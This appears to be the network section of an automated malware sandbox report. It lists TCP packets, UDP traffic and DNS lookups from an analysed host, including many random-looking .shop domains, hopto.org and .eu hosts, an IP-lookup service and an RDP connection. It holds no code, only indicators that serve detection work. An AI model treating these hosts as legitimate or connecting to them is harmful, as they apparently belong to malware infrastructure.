Sep 27, 2024 01:39:00.781703949 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.781732082 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.781761885 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.781761885 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.781799078 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.781965017 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782008886 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782051086 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782051086 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782057047 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782196045 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782310963 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782351971 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782470942 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782475948 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782506943 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782506943 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782713890 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782756090 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782790899 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782797098 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.782816887 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.782850027 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.816427946 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.816473007 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.816519976 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.816534042 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.816550970 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.816643000 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.816931963 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.816975117 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.817009926 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.817017078 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.817030907 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.817082882 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.872936964 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.872983932 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873223066 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.873250008 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873353004 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873399973 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873425961 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.873425961 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.873435020 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873472929 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.873512030 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.873919964 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873960972 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.873987913 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.873992920 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874027014 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874027014 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874218941 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874259949 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874300957 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874305964 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874345064 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874345064 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874597073 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874651909 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874696970 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874702930 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.874718904 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874787092 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.874978065 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.875020981 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.875061035 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.875066996 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.875088930 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.875108957 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.909004927 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.909054041 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.909113884 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.909125090 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.909276009 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.909276009 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.909604073 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.909691095 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.909697056 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.909717083 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.909759998 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.909759998 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.965368032 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.965415955 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.965576887 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.965576887 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.965584993 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.965641975 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.965709925 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.965754986 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.965778112 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.965785027 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.965815067 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.965845108 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.966245890 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.966288090 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.966331005 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.966336012 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.966350079 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.966383934 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.966691971 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.966732979 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.966778994 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.966785908 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.966825008 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.966825008 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.967107058 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.967187881 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.967190981 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.967216969 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.967267990 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.967267990 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.967366934 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.967426062 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.967438936 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:00.967446089 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:00.967533112 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.001701117 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.001745939 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.002027035 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.002034903 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.002187014 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.002542973 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.002587080 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.002640963 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.002640963 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.002648115 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.002681017 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.057910919 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.057955980 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058115005 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058115005 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058125019 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058154106 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058201075 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058201075 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058255911 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058255911 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058265924 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058321953 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058469057 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058511019 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058561087 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058567047 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058602095 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058614969 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058660984 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058732033 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058794022 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058794022 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058801889 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058845997 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.058854103 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.058868885 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.059025049 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.059031010 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.059395075 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.059406042 CEST	443	49760	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.059421062 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.059421062 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.059487104 CEST	49760	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.075655937 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.075716972 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.075787067 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.075993061 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.076005936 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.719639063 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.719842911 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.720288038 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.720293045 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.723184109 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.723189116 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:01.723225117 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:01.723228931 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.026402950 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:02.031405926 CEST	80	49762	104.26.12.205	192.168.2.7
Sep 27, 2024 01:39:02.031599998 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:02.031713963 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:02.036704063 CEST	80	49762	104.26.12.205	192.168.2.7
Sep 27, 2024 01:39:02.123317957 CEST	49763	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.123363018 CEST	443	49763	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.123442888 CEST	49763	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.123718977 CEST	49763	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.123729944 CEST	443	49763	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.373341084 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.373394012 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.373415947 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.373452902 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.373464108 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.373511076 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.374411106 CEST	49761	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:02.374423981 CEST	443	49761	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.517153025 CEST	80	49762	104.26.12.205	192.168.2.7
Sep 27, 2024 01:39:02.557543039 CEST	49764	3389	192.168.2.7	8.46.123.33
Sep 27, 2024 01:39:02.562479973 CEST	3389	49764	8.46.123.33	192.168.2.7
Sep 27, 2024 01:39:02.562562943 CEST	49764	3389	192.168.2.7	8.46.123.33
Sep 27, 2024 01:39:02.562906027 CEST	49764	3389	192.168.2.7	8.46.123.33
Sep 27, 2024 01:39:02.564286947 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:02.564635038 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:02.567904949 CEST	3389	49764	8.46.123.33	192.168.2.7
Sep 27, 2024 01:39:02.567964077 CEST	49764	3389	192.168.2.7	8.46.123.33
Sep 27, 2024 01:39:02.569436073 CEST	80	49762	104.26.12.205	192.168.2.7
Sep 27, 2024 01:39:02.687342882 CEST	80	49762	104.26.12.205	192.168.2.7
Sep 27, 2024 01:39:02.733885050 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:02.733932018 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:02.733989954 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:02.736144066 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:02.741796970 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:02.741815090 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:02.768568993 CEST	443	49763	5.75.211.162	192.168.2.7
Sep 27, 2024 01:39:02.768672943 CEST	49763	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:03.465122938 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:03.465241909 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:03.467621088 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:03.467634916 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:03.467884064 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:03.517504930 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:03.528409958 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:03.575406075 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:03.836421967 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:03.838963032 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:03.838977098 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:04.125967026 CEST	49763	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:39:04.287693024 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:04.287755966 CEST	443	49765	188.114.96.3	192.168.2.7
Sep 27, 2024 01:39:04.287859917 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:04.288718939 CEST	49765	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:39:04.296416044 CEST	49762	80	192.168.2.7	104.26.12.205
Sep 27, 2024 01:39:04.296492100 CEST	49743	80	192.168.2.7	147.45.44.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 01:37:33.310930014 CEST	54710	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:37:33.346299887 CEST	53	54710	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:13.634673119 CEST	63092	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:13.645916939 CEST	53	63092	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:14.617053032 CEST	55367	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:14.629435062 CEST	53	55367	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:15.546489000 CEST	56659	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:15.559499979 CEST	53	56659	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:16.523200035 CEST	57781	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:16.536145926 CEST	53	57781	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:17.515825987 CEST	60213	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:17.527419090 CEST	53	60213	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:18.558828115 CEST	58425	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:18.571049929 CEST	53	58425	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:20.021116018 CEST	59642	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:20.032887936 CEST	53	59642	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:20.963294029 CEST	57807	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:20.965723038 CEST	60315	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:20.973926067 CEST	53	60315	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:20.976563931 CEST	53	57807	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:21.910689116 CEST	59109	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:21.927278996 CEST	53	59109	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:23.208116055 CEST	51444	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:23.214838982 CEST	53	51444	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:24.518610001 CEST	52022	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:24.736774921 CEST	53	52022	1.1.1.1	192.168.2.7
Sep 27, 2024 01:38:47.901946068 CEST	57110	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:38:47.908890963 CEST	53	57110	1.1.1.1	192.168.2.7
Sep 27, 2024 01:39:02.017281055 CEST	64767	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:39:02.024305105 CEST	53	64767	1.1.1.1	192.168.2.7
Sep 27, 2024 01:39:02.689605951 CEST	56288	53	192.168.2.7	1.1.1.1
Sep 27, 2024 01:39:02.733339071 CEST	53	56288	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 01:37:33.310930014 CEST	192.168.2.7	1.1.1.1	0xd116	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:13.634673119 CEST	192.168.2.7	1.1.1.1	0x6eaa	Standard query (0)	wallkedsleeoi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:14.617053032 CEST	192.168.2.7	1.1.1.1	0xfba5	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:15.546489000 CEST	192.168.2.7	1.1.1.1	0x6e79	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:16.523200035 CEST	192.168.2.7	1.1.1.1	0x27a1	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:17.515825987 CEST	192.168.2.7	1.1.1.1	0x8ab0	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:18.558828115 CEST	192.168.2.7	1.1.1.1	0xab6f	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.021116018 CEST	192.168.2.7	1.1.1.1	0xa9de	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.963294029 CEST	192.168.2.7	1.1.1.1	0x110f	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.965723038 CEST	192.168.2.7	1.1.1.1	0x1039	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:21.910689116 CEST	192.168.2.7	1.1.1.1	0x7254	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:23.208116055 CEST	192.168.2.7	1.1.1.1	0xf660	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:24.518610001 CEST	192.168.2.7	1.1.1.1	0xf0e6	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:47.901946068 CEST	192.168.2.7	1.1.1.1	0x7f72	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.017281055 CEST	192.168.2.7	1.1.1.1	0xe94e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.689605951 CEST	192.168.2.7	1.1.1.1	0x9f4d	Standard query (0)	hansgborn.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 01:37:33.346299887 CEST	1.1.1.1	192.168.2.7	0xd116	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:13.645916939 CEST	1.1.1.1	192.168.2.7	0x6eaa	No error (0)	wallkedsleeoi.shop	172.67.194.216	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:13.645916939 CEST	1.1.1.1	192.168.2.7	0x6eaa	No error (0)	wallkedsleeoi.shop	104.21.36.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:14.629435062 CEST	1.1.1.1	192.168.2.7	0xfba5	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:14.629435062 CEST	1.1.1.1	192.168.2.7	0xfba5	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:15.559499979 CEST	1.1.1.1	192.168.2.7	0x6e79	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:15.559499979 CEST	1.1.1.1	192.168.2.7	0x6e79	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:16.536145926 CEST	1.1.1.1	192.168.2.7	0x27a1	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:16.536145926 CEST	1.1.1.1	192.168.2.7	0x27a1	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:17.527419090 CEST	1.1.1.1	192.168.2.7	0x8ab0	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:17.527419090 CEST	1.1.1.1	192.168.2.7	0x8ab0	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:18.571049929 CEST	1.1.1.1	192.168.2.7	0xab6f	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:18.571049929 CEST	1.1.1.1	192.168.2.7	0xab6f	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.032887936 CEST	1.1.1.1	192.168.2.7	0xa9de	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.032887936 CEST	1.1.1.1	192.168.2.7	0xa9de	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.973926067 CEST	1.1.1.1	192.168.2.7	0x1039	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.976563931 CEST	1.1.1.1	192.168.2.7	0x110f	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:20.976563931 CEST	1.1.1.1	192.168.2.7	0x110f	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:21.927278996 CEST	1.1.1.1	192.168.2.7	0x7254	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:21.927278996 CEST	1.1.1.1	192.168.2.7	0x7254	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
